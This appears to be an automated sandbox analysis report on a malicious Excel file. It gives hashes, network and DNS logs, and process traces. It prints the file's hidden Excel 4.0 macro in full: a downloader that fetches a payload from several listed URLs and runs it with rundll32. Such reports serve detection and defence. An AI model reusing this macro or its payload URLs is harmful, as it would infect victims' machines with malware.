        SHA1:944d23b8a649430a40458071c4b3780d9a4f5801
        SHA256:249f772d85dd7c9ab127a05ba592f5b2cc68ddd805b62c97864b87210558b729
        SHA512:8f0c70bdd0b9c90419da5ae89a9752c9255071eb116287f52c35ccb63213d55010e317e4c04dcb63de6562a1746e88829a0de8a0bd32d2dd04c7abd2b5541ed9
        SSDEEP:1536:3PkrrXjl7p20B+axURtKckrr9qZGrhD1GW+wZk4lHpuaI4q7VGFHl:/kHjl7HHxutKckrpqZGh+wrlJuaIjcFF
        File Content Preview:PK..........!.s.R..... .......[Content_Types].xml ...(.........................................................................................................................................................................................................
        Icon Hash:e4e2aa8aa4bcbcac
        Document Type:OpenXML
        Number of OLE Files:1
        Has Summary Info:
        Application Name:
        Encrypted Document:
        Contains Word Document Stream:
        Contains Workbook/Book Stream:
        Contains PowerPoint Document Stream:
        Contains Visio Document Stream:
        Contains ObjectPool Stream:
        Flash Objects Count:
        Contains VBA Macros:
        Name:EFEWFWXV
        Type:4
        Final:False
        Visible:False
        Protected:False
        EFEWFWXV4False0Falsepre5,2,=FORMULA("DllRegisterServer",KKLD8)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://burialinsurancelab.com/q5kje9/K1mF/","..\iix.ocx",0,0)",C15)=FORMULA("=IF(KKLD<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://lealracecars.com/donnacox/fVqOYBzAUoU/","..\iix.ocx",0,0))",C17)=FORMULA("=IF(KKLD1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://edgetactical.ritabilisim.com/admin/2jKBEGDY0XpcgxF7f/","..\iix.ocx",0,0))",C19)=FORMULA("=IF(KKLD2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://4seasonsflorals.com/yhedjkl/BYwyXorqDywx/","..\iix.ocx",0,0))",C21)=FORMULA("=IF(KKLD3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://boldconsulting.info/bkzh6v/eqbAgc3oMGBsC5VDn1w/","..\iix.ocx",0,0))",C23)=FORMULA("=IF(KKLD4<0, CLOSE(0),)",C25)=FORMULA("=EXEC("C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,"&KKLD8)",C27)30,2,=RETURN()
        Name:EFEWFWXV
        Type:4
        Final:False
        Visible:False
        Protected:False
        EFEWFWXV4False0Falsepost5,2,=FORMULA("DllRegisterServer",KKLD8)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://burialinsurancelab.com/q5kje9/K1mF/","..\iix.ocx",0,0)",C15)=FORMULA("=IF(KKLD<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://lealracecars.com/donnacox/fVqOYBzAUoU/","..\iix.ocx",0,0))",C17)=FORMULA("=IF(KKLD1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://edgetactical.ritabilisim.com/admin/2jKBEGDY0XpcgxF7f/","..\iix.ocx",0,0))",C19)=FORMULA("=IF(KKLD2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://4seasonsflorals.com/yhedjkl/BYwyXorqDywx/","..\iix.ocx",0,0))",C21)=FORMULA("=IF(KKLD3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://boldconsulting.info/bkzh6v/eqbAgc3oMGBsC5VDn1w/","..\iix.ocx",0,0))",C23)=FORMULA("=IF(KKLD4<0, CLOSE(0),)",C25)=FORMULA("=EXEC("C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,"&KKLD8)",C27)8,2,DllRegisterServer14,2,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://burialinsurancelab.com/q5kje9/K1mF/","..\iix.ocx",0,0)16,2,=IF(KKLD<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://lealracecars.com/donnacox/fVqOYBzAUoU/","..\iix.ocx",0,0))18,2,=IF(KKLD1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://edgetactical.ritabilisim.com/admin/2jKBEGDY0XpcgxF7f/","..\iix.ocx",0,0))20,2,=IF(KKLD2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://4seasonsflorals.com/yhedjkl/BYwyXorqDywx/","..\iix.ocx",0,0))22,2,=IF(KKLD3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://boldconsulting.info/bkzh6v/eqbAgc3oMGBsC5VDn1w/","..\iix.ocx",0,0))24,2,=IF(KKLD4<0, CLOSE(0),)26,2,=EXEC("C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,"&KKLD8)30,2,=RETURN()
        TimestampSource PortDest PortSource IPDest IP
        Feb 4, 2022 11:17:19.428431034 CET49165443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:19.428498030 CET44349165190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:19.428608894 CET49165443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:19.439160109 CET49165443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:19.439220905 CET44349165190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:20.053210974 CET44349165190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:20.053528070 CET49165443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:20.070975065 CET49165443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:20.071031094 CET44349165190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:20.071352005 CET44349165190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:20.071434975 CET49165443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:20.279237032 CET49165443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:20.321898937 CET44349165190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:20.478128910 CET44349165190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:20.478286982 CET44349165190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:20.478291988 CET49165443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:20.478363991 CET49165443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:20.479675055 CET49165443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:20.479688883 CET44349165190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:20.482958078 CET49166443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:20.483019114 CET44349166190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:20.483163118 CET49166443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:20.484294891 CET49166443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:20.484323025 CET44349166190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:20.873569012 CET44349166190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:20.873809099 CET49166443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:20.874777079 CET49166443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:20.874797106 CET44349166190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:20.898116112 CET49166443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:20.898133039 CET44349166190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:21.312211037 CET44349166190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:21.312565088 CET49166443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:21.312604904 CET44349166190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:21.312693119 CET49166443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:21.313065052 CET44349166190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:21.313142061 CET49166443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:21.313163042 CET44349166190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:21.313213110 CET44349166190.92.141.240192.168.2.22
        Feb 4, 2022 11:17:21.313232899 CET49166443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:21.313275099 CET49166443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:21.320352077 CET49166443192.168.2.22190.92.141.240
        Feb 4, 2022 11:17:21.320389032 CET44349166190.92.141.240192.168.2.22
        TimestampSource PortDest PortSource IPDest IP
        Feb 4, 2022 11:17:19.237400055 CET5216753192.168.2.228.8.8.8
        Feb 4, 2022 11:17:19.409754038 CET53521678.8.8.8192.168.2.22
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
        Feb 4, 2022 11:17:19.237400055 CET192.168.2.228.8.8.80x6513Standard query (0)burialinsurancelab.comA (IP address)IN (0x0001)
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
        Feb 4, 2022 11:17:19.409754038 CET8.8.8.8192.168.2.220x6513No error (0)burialinsurancelab.com190.92.141.240A (IP address)IN (0x0001)
        • burialinsurancelab.com
        Session IDSource IPSource PortDestination IPDestination PortProcess
        0192.168.2.2249165190.92.141.240443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        TimestampkBytes transferredDirectionData
        2022-02-04 10:17:20 UTC0OUTGET /q5kje9/K1mF/ HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: burialinsurancelab.com
        Connection: Keep-Alive
        2022-02-04 10:17:20 UTC0INHTTP/1.1 302 Found
        Date: Fri, 04 Feb 2022 10:17:20 GMT
        Server: Apache
        Strict-Transport-Security: max-age=63072000; includeSubDomains
        X-Frame-Options: SAMEORIGIN
        X-Content-Type-Options: nosniff
        Location: https://burialinsurancelab.com/cgi-sys/suspendedpage.cgi
        Content-Length: 240
        Connection: close
        Content-Type: text/html; charset=iso-8859-1
        2022-02-04 10:17:20 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 75 72 69 61 6c 69 6e 73 75 72 61 6e 63 65 6c 61 62 2e 63 6f 6d 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://burialinsurancelab.com/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>


        Session IDSource IPSource PortDestination IPDestination PortProcess
        1192.168.2.2249166190.92.141.240443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        TimestampkBytes transferredDirectionData
        2022-02-04 10:17:20 UTC0OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: burialinsurancelab.com
        Connection: Keep-Alive
        2022-02-04 10:17:21 UTC1INHTTP/1.1 200 OK
        Date: Fri, 04 Feb 2022 10:17:21 GMT
        Server: Apache
        Strict-Transport-Security: max-age=63072000; includeSubDomains
        X-Frame-Options: SAMEORIGIN
        X-Content-Type-Options: nosniff
        Upgrade: h2,h2c
        Connection: Upgrade, close
        Transfer-Encoding: chunked
        Content-Type: text/html
        2022-02-04 10:17:21 UTC1INData Raw: 32 35 64 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 3c 21 2d 2d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 31 31 31 31 31 31 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62
        Data Ascii: 25d<html><head><title></title><style type="text/css">...body {margin-top: 20px;text-align: center;font-family: Tahoma, Arial, Helvetica, sans-serif;font-size: 14px;color: #111111;}h1 {font-size: 20px;margin-b
        2022-02-04 10:17:21 UTC2INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:11:18:12
        Start date:04/02/2022
        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
        Imagebase:0x13fde0000
        File size:28253536 bytes
        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Target ID:3
        Start time:11:18:19
        Start date:04/02/2022
        Path:C:\Windows\SysWOW64\rundll32.exe
        Wow64 process (32bit):true
        Commandline:C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D"&"l"&"lR"&"egister"&"Serve"&"r
        Imagebase:0xe0000
        File size:44544 bytes
        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        No disassembly